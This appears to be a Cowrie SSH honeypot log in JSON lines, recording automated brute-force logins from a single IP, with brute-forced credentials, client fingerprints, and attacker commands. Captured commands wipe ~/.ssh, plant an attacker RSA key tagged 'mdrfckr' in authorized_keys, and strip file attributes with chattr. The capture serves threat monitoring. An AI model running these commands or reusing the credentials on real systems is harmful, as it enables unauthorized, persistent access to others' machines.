{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.153637Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.472039Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.472929Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.611789Z","src_ip":"212.227.235.229","session":"6e1b3cc0588a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48540,"dst_ip":"1.2.3.4","dst_port":22,"session":"67968f0e423d","protocol":"ssh","message":"New connection: 212.227.235.229:48540 (1.2.3.4:22) [session: 67968f0e423d]","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.761420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.762424Z","src_ip":"212.227.235.229","session":"67968f0e423d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:32.819858Z","src_ip":"212.227.235.229","session":"2517baab673c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:33.066075Z","src_ip":"212.227.235.229","session":"67968f0e423d"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:33.112934Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:33.115651Z","src_ip":"212.227.235.229","session":"2517baab673c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39714,"dst_ip":"1.2.3.4","dst_port":22,"session":"7526ade8db94","protocol":"ssh","message":"New connection: 212.227.235.229:39714 (1.2.3.4:22) [session: 7526ade8db94]","sensor":"my-vps","timestamp":"2025-09-08T22:02:34.007578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:34.008274Z","src_ip":"212.227.235.229","session":"7526ade8db94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:34.260792Z","src_ip":"212.227.235.229","session":"7526ade8db94"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:34.313776Z","src_ip":"212.227.235.229","session":"67968f0e423d"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:35.315983Z","src_ip":"212.227.235.229","session":"7526ade8db94"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:35.620233Z","src_ip":"212.227.235.229","session":"67968f0e423d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48556,"dst_ip":"1.2.3.4","dst_port":22,"session":"607b7be22c81","protocol":"ssh","message":"New connection: 212.227.235.229:48556 (1.2.3.4:22) [session: 607b7be22c81]","sensor":"my-vps","timestamp":"2025-09-08T22:02:35.942583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:35.943799Z","src_ip":"212.227.235.229","session":"607b7be22c81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:36.257680Z","src_ip":"212.227.235.229","session":"607b7be22c81"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:36.570841Z","src_ip":"212.227.235.229","session":"7526ade8db94"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:37.554297Z","src_ip":"212.227.235.229","session":"607b7be22c81"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:37.869534Z","src_ip":"212.227.235.229","session":"607b7be22c81"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:37.871256Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32940,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee0a6656a49d","protocol":"ssh","message":"New connection: 212.227.235.229:32940 (1.2.3.4:22) [session: ee0a6656a49d]","sensor":"my-vps","timestamp":"2025-09-08T22:02:37.971975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:37.972643Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60316,"dst_ip":"1.2.3.4","dst_port":22,"session":"e540ab9597fb","protocol":"ssh","message":"New connection: 212.227.235.229:60316 (1.2.3.4:22) [session: e540ab9597fb]","sensor":"my-vps","timestamp":"2025-09-08T22:02:38.240976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:38.272637Z","src_ip":"212.227.235.229","session":"e540ab9597fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:38.308072Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:38.600622Z","src_ip":"212.227.235.229","session":"e540ab9597fb"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia2025","message":"login attempt [nvidia/nvidia2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:39.443367Z","src_ip":"212.227.235.229","session":"e540ab9597fb"}
{"eventid":"cowrie.login.success","username":"root","password":"radware","message":"login attempt [root/radware] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:39.680176Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:40.407159Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.407714Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.408677Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.648430Z","src_ip":"212.227.235.229","session":"e540ab9597fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47174,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee8da9013c2c","protocol":"ssh","message":"New connection: 212.227.235.229:47174 (1.2.3.4:22) [session: ee8da9013c2c]","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.683654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.684470Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.741879Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:40.935859Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:41.462795Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:41.463484Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:41.798174Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:41.799484Z","src_ip":"212.227.235.229","session":"ee0a6656a49d"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssw0rd123!@#","message":"login attempt [root/P@Ssw0rd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:41.985016Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32956,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e1ebd1e5c7","protocol":"ssh","message":"New connection: 212.227.235.229:32956 (1.2.3.4:22) [session: 39e1ebd1e5c7]","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.114010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.115364Z","src_ip":"212.227.235.229","session":"39e1ebd1e5c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.440579Z","src_ip":"212.227.235.229","session":"39e1ebd1e5c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:42.516510Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.517235Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.518044Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:42.770641Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:43.769665Z","src_ip":"212.227.235.229","session":"39e1ebd1e5c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:43.870314Z","src_ip":"212.227.235.229","session":"ee8da9013c2c"}
